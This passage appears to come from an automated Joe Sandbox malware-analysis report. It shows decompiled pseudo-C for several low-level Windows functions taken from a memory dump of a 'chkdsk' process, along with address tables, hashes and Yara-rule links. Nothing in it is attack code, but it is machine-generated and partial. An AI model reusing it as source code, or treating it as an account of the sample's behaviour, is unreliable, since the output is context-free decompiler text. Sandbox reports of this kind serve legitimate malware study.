								E04E06B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04DA7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04DC9AE0();
								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04DA2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04DA2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04DA2400( &_v52);
							}
							if(_v28 >= 0) {
								return L04DA2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                      0x04e06dd4
                                                      0x04e06dde
                                                      0x04e06de1
                                                      0x04e06de3
                                                      0x04e06de6
                                                      0x04e06de9
                                                      0x04e06dec
                                                      0x04e06def
                                                      0x04e06df2
                                                      0x04e06df5
                                                      0x04e06dfe
                                                      0x04e06e04
                                                      0x04e06e09
                                                      0x04e06e0d
                                                      0x04e06e18
                                                      0x04e06e1b
                                                      0x04e06e22
                                                      0x04e06e2d
                                                      0x04e06e30
                                                      0x04e06e36
                                                      0x04e06e42
                                                      0x04e06e4d
                                                      0x04e06e50
                                                      0x04e06e55
                                                      0x04e06e5c
                                                      0x04e06e6e
                                                      0x04e06e5e
                                                      0x04e06e67
                                                      0x04e06e67
                                                      0x04e06e73
                                                      0x04e06e74
                                                      0x04e06e77
                                                      0x04e06e7c
                                                      0x04e06e7d
                                                      0x04e06e8e
                                                      0x04e06e93
                                                      0x04e06e9c
                                                      0x04e06ea8
                                                      0x04e06eab
                                                      0x04e06eac
                                                      0x04e06eb3
                                                      0x04e06ecd
                                                      0x04e06edc
                                                      0x04e06ee2
                                                      0x04e06ee5
                                                      0x04e06ef2
                                                      0x04e06efb
                                                      0x04e06f01
                                                      0x04e06f06
                                                      0x04e06f0b
                                                      0x04e06f11
                                                      0x04e06f1a
                                                      0x04e06f22
                                                      0x04e06f26
                                                      0x04e06f26
                                                      0x04e06f33
                                                      0x04e06f41
                                                      0x04e06f44
                                                      0x04e06f47
                                                      0x04e06f54
                                                      0x04e06f65
                                                      0x04e06f77
                                                      0x04e06f7c
                                                      0x04e06f82
                                                      0x04e06f91
                                                      0x04e06f99
                                                      0x04e06fa3
                                                      0x04e06fae
                                                      0x04e06fae
                                                      0x04e06fba
                                                      0x04e06fbb
                                                      0x04e06fbc
                                                      0x04e06fc1
                                                      0x04e06fc2
                                                      0x04e06fd3
                                                      0x04e06fd8
                                                      0x04e06fd8
                                                      0x04e06fdf
                                                      0x04e06fe8
                                                      0x04e06fee
                                                      0x04e06fee
                                                      0x04e06ff5
                                                      0x04e06ffb
                                                      0x04e06ffb
                                                      0x04e07004
                                                      0x00000000
                                                      0x04e0700a
                                                      0x04e07004
                                                      0x04e06eb3
                                                      0x04e06e9c
                                                      0x04e07015

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: 3133d67f9782e375224b352801b40c5c57b2c7161a1158c4cd8694af81ea186b
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: 73716C71A00209EFDB10DFA5C984AEEBBB9FF48714F148169E515E7290DB34FA51CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E1B8D0 Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 39%
                                                      			E04E1B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4e77b9c; // 0x0
				_t124 = L04DA4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04DC9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04DC95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04DC95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04DA77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04DC9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04DC95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4e77b9c; // 0x0
									_t92 = L04DA4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04DC9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04D8A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04E1E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04E1E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04DC95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                      0x04e1b8d9
                                                      0x04e1b8e4
                                                      0x00000000
                                                      0x04e1b8e6
                                                      0x04e1b8f3
                                                      0x04e1b8f5
                                                      0x04e1b8f5
                                                      0x04e1b8f8
                                                      0x04e1b920
                                                      0x04e1b924
                                                      0x04e1b936
                                                      0x04e1b939
                                                      0x04e1b93d
                                                      0x04e1b948
                                                      0x04e1b9a0
                                                      0x04e1b9a0
                                                      0x04e1b9a4
                                                      0x04e1b9bf
                                                      0x04e1b9c4
                                                      0x04e1b9c6
                                                      0x04e1b9cd
                                                      0x04e1b9d1
                                                      0x04e1bad4
                                                      0x04e1bad8
                                                      0x04e1bada
                                                      0x04e1badc
                                                      0x04e1badc
                                                      0x04e1badf
                                                      0x04e1bae0
                                                      0x04e1bae2
                                                      0x04e1bae4
                                                      0x04e1baec
                                                      0x04e1baee
                                                      0x04e1baf0
                                                      0x04e1baf0
                                                      0x04e1baec
                                                      0x04e1bafb
                                                      0x04e1bafc
                                                      0x04e1bafe
                                                      0x04e1bb01
                                                      0x04e1bb01
                                                      0x00000000
                                                      0x04e1bb06
                                                      0x04e1b9d7
                                                      0x04e1b9db
                                                      0x04e1b9db
                                                      0x04e1b9de
                                                      0x04e1b9de
                                                      0x04e1b9e4
                                                      0x04e1b9e7
                                                      0x04e1b9ea
                                                      0x04e1b9ec
                                                      0x04e1b9ef
                                                      0x04e1b9f3
                                                      0x04e1ba1b
                                                      0x04e1ba1b
                                                      0x04e1ba23
                                                      0x04e1ba24
                                                      0x04e1ba27
                                                      0x04e1ba2a
                                                      0x04e1ba2b
                                                      0x04e1ba2e
                                                      0x04e1ba30
                                                      0x04e1ba37
                                                      0x04e1ba3f
                                                      0x04e1ba9c
                                                      0x04e1baa2
                                                      0x04e1bb13
                                                      0x04e1bb15
                                                      0x04e1baae
                                                      0x04e1baae
                                                      0x04e1bab3
                                                      0x04e1bab5
                                                      0x04e1baba
                                                      0x04e1bac8
                                                      0x04e1bac8
                                                      0x04e1baba
                                                      0x04e1bacd
                                                      0x04e1bacf
                                                      0x00000000
                                                      0x04e1bacf
                                                      0x04e1bb1a
                                                      0x00000000
                                                      0x04e1bb1c
                                                      0x04e1baa7
                                                      0x04e1bb11
                                                      0x00000000
                                                      0x04e1bb11
                                                      0x04e1baa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e1ba41
                                                      0x04e1ba41
                                                      0x04e1ba41
                                                      0x04e1ba58
                                                      0x04e1ba5d
                                                      0x04e1ba62
                                                      0x00000000
                                                      0x00000000
                                                      0x04e1ba64
                                                      0x04e1ba67
                                                      0x04e1ba68
                                                      0x04e1ba69
                                                      0x04e1ba6c
                                                      0x04e1ba6f
                                                      0x04e1ba71
                                                      0x04e1ba78
                                                      0x04e1ba80
                                                      0x00000000
                                                      0x00000000
                                                      0x04e1ba90
                                                      0x04e1ba90
                                                      0x04e1ba97
                                                      0x00000000
                                                      0x04e1ba97
                                                      0x04e1b9f5
                                                      0x04e1b9f7
                                                      0x04e1b9f7
                                                      0x04e1b9fa
                                                      0x04e1ba03
                                                      0x04e1ba07
                                                      0x04e1ba0c
                                                      0x04e1ba10
                                                      0x04e1ba17
                                                      0x00000000
                                                      0x04e1b9f7
                                                      0x04e1b9a6
                                                      0x04e1b9a8
                                                      0x04e1b9af
                                                      0x04e1b9b3
                                                      0x00000000
                                                      0x00000000
                                                      0x04e1b9b9
                                                      0x00000000
                                                      0x04e1b9b9
                                                      0x04e1b94d
                                                      0x04e1b98f
                                                      0x04e1b995
                                                      0x04e1b999
                                                      0x04e1b960
                                                      0x04e1b967
                                                      0x04e1b968
                                                      0x04e1b96a
                                                      0x00000000
                                                      0x04e1b96a
                                                      0x04e1b99b
                                                      0x04e1b99e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e1b99e
                                                      0x04e1b951
                                                      0x04e1b954
                                                      0x04e1b95a
                                                      0x04e1b95e
                                                      0x04e1b972
                                                      0x04e1b979
                                                      0x04e1b97d
                                                      0x04e1b97f
                                                      0x04e1b980
                                                      0x04e1b982
                                                      0x04e1b984
                                                      0x00000000
                                                      0x04e1b984
                                                      0x00000000
                                                      0x04e1b926
                                                      0x00000000
                                                      0x04e1b926

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1ab2fa7ccacc69eecd21a2dc32abf0c5c46cb73ef188c12187c777a11c1256e
                                                      • Instruction ID: 3400055d85d05549add731a88ffbcac5412c0a228e8e361c2a0ec132bbe9c8b0
                                                      • Opcode Fuzzy Hash: c1ab2fa7ccacc69eecd21a2dc32abf0c5c46cb73ef188c12187c777a11c1256e
                                                      • Instruction Fuzzy Hash: 2D71FD32280701EFE731CF25C844FAABBA5EF44728F144529E6958B6B0EB75F941CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D852A5 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E04D852A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04D9EEF0(0x4e779a0);
					_t104 =  *0x4e78210; // 0x302bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E04D9EB70(_t93, 0x4e779a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04DC9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04D9EEF0(0x4e779a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04D9EB70(0, 0x4e779a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x302bc802
								_t13 = _t104 + 0xc; // 0x302bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04DBF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04D9EEF0(0x4e779a0);
									__eflags =  *0x4e78210 - _t104; // 0x302bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4e78210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000302b
											_t95 =  *((intOrPtr*)( *_t37));
											E04E04888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E04D9EB70(_t95, 0x4e779a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E04DC95D0();
											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E04DC95D0();
											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04D9EB70(_t93, 0x4e779a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E04DC95D0();
										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04DC95D0();
										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000302b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x302bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04DBF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                      0x04d852a5
                                                      0x04d852ad
                                                      0x04d852b0
                                                      0x04d852b3
                                                      0x04d852b7
                                                      0x04d852ba
                                                      0x04d852bf
                                                      0x04d852c4
                                                      0x04d852cc
                                                      0x00000000
                                                      0x00000000
                                                      0x04d852ce
                                                      0x04d852d1
                                                      0x04d852d9
                                                      0x04d852dd
                                                      0x04d852e7
                                                      0x04d852f7
                                                      0x04d852f9
                                                      0x04d852fd
                                                      0x04de0dcf
                                                      0x04de0dd5
                                                      0x04de0dd6
                                                      0x04de0dd7
                                                      0x04de0dd8
                                                      0x04de0dd9
                                                      0x04de0dde
                                                      0x04de0ddf
                                                      0x04de0de0
                                                      0x04de0de1
                                                      0x04de0de2
                                                      0x04de0de2
                                                      0x04de0de5
                                                      0x04de0dea
                                                      0x04de0dec
                                                      0x04de0f60
                                                      0x04de0f64
                                                      0x04de0f70
                                                      0x04de0f76
                                                      0x04de0f79
                                                      0x04de0f79
                                                      0x00000000
                                                      0x04de0f64
                                                      0x04de0df2
                                                      0x04de0df7
                                                      0x04de0e04
                                                      0x04de0e04
                                                      0x04de0e0d
                                                      0x04de0e0d
                                                      0x04de0e10
                                                      0x04de0e1a
                                                      0x04de0e1c
                                                      0x04de0e4c
                                                      0x04de0e52
                                                      0x04de0e61
                                                      0x04de0e67
                                                      0x04de0e6b
                                                      0x04de0e70
                                                      0x04de0e76
                                                      0x04de0ed7
                                                      0x04de0edc
                                                      0x04de0ee0
                                                      0x04de0ee6
                                                      0x04de0eea
                                                      0x04de0eed
                                                      0x04de0ef0
                                                      0x04de0ef3
                                                      0x04de0ef6
                                                      0x04de0ef9
                                                      0x04de0efb
                                                      0x04de0efe
                                                      0x04de0f01
                                                      0x04de0f01
                                                      0x04de0f0b
                                                      0x04de0f12
                                                      0x04de0f16
                                                      0x04de0f18
                                                      0x04de0f18
                                                      0x04de0f1b
                                                      0x04de0f2c
                                                      0x04de0f31
                                                      0x04de0f31
                                                      0x04de0f35
                                                      0x04de0f39
                                                      0x04de0f3a
                                                      0x04de0f3c
                                                      0x04de0f3c
                                                      0x04de0f3f
                                                      0x04de0f50
                                                      0x04de0f55
                                                      0x04de0f55
                                                      0x04de0f59
                                                      0x04d852eb
                                                      0x04d852f1
                                                      0x04d852f1
                                                      0x04de0e7d
                                                      0x04de0e84
                                                      0x04de0e88
                                                      0x04de0e8a
                                                      0x04de0e8a
                                                      0x04de0e8d
                                                      0x04de0e9e
                                                      0x04de0ea3
                                                      0x04de0ea3
                                                      0x04de0ea7
                                                      0x04de0eaf
                                                      0x04de0eb3
                                                      0x04de0eb9
                                                      0x04de0eb9
                                                      0x04de0ebc
                                                      0x04de0ecd
                                                      0x04de0ecd
                                                      0x00000000
                                                      0x04de0eb3
                                                      0x04de0e1e
                                                      0x04de0e21
                                                      0x04de0e25
                                                      0x04de0e2b
                                                      0x04de0e2f
                                                      0x04de0e30
                                                      0x04de0e3a
                                                      0x04de0e3f
                                                      0x04de0e41
                                                      0x00000000
                                                      0x00000000
                                                      0x04de0e47
                                                      0x00000000
                                                      0x04de0e47
                                                      0x04de0df9
                                                      0x04de0dfe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de0dfe
                                                      0x04d85303
                                                      0x04d85307
                                                      0x00000000
                                                      0x04d85309
                                                      0x00000000
                                                      0x04d85309
                                                      0x04d85307
                                                      0x04d852e9
                                                      0x04d852e9
                                                      0x00000000
                                                      0x04d852e9
                                                      0x04d8530e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e223b501ff99e497af99915dcb241a8f8fc2afbf76288ffc61346c019088cf4
                                                      • Instruction ID: 42a65a0e4c6058351749902cfcb77ca2e92e35ed4d1967672460b7a80dc339ed
                                                      • Opcode Fuzzy Hash: 6e223b501ff99e497af99915dcb241a8f8fc2afbf76288ffc61346c019088cf4
                                                      • Instruction Fuzzy Hash: 3951CA71205742EBE722EF68C840B27BBE4FF40718F10491EE49587691EBB0F810CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB2AE4 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4e78204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4e78208; // 0x4e78207
				_t8 = _t57 + 0x4e78208; // 0x4e78207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4e78450; // 0x3010f2
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4e7821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4e76d5c; // 0xff050654
							_t72 =  *0x4e76d5c; // 0xff050654
							_t75 =  *0x4e76d5c; // 0xff050654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4e76d5c; // 0xff050654
							_t84 =  *0x4e76d5c; // 0xff050654
							_t87 =  *0x4e76d5c; // 0xff050654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04DCF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                      0x04db2ae4
                                                      0x04db2aec
                                                      0x04db2aef
                                                      0x04db2af4
                                                      0x04db2af7
                                                      0x04db2afd
                                                      0x04db2b92
                                                      0x04db2b92
                                                      0x04db2b97
                                                      0x04db2b9c
                                                      0x04db2b9c
                                                      0x04db2b03
                                                      0x04db2b06
                                                      0x04db2b09
                                                      0x04db2b09
                                                      0x04db2b0f
                                                      0x04db2b15
                                                      0x04db2b15
                                                      0x04db2b1b
                                                      0x04db2b1e
                                                      0x04db2b21
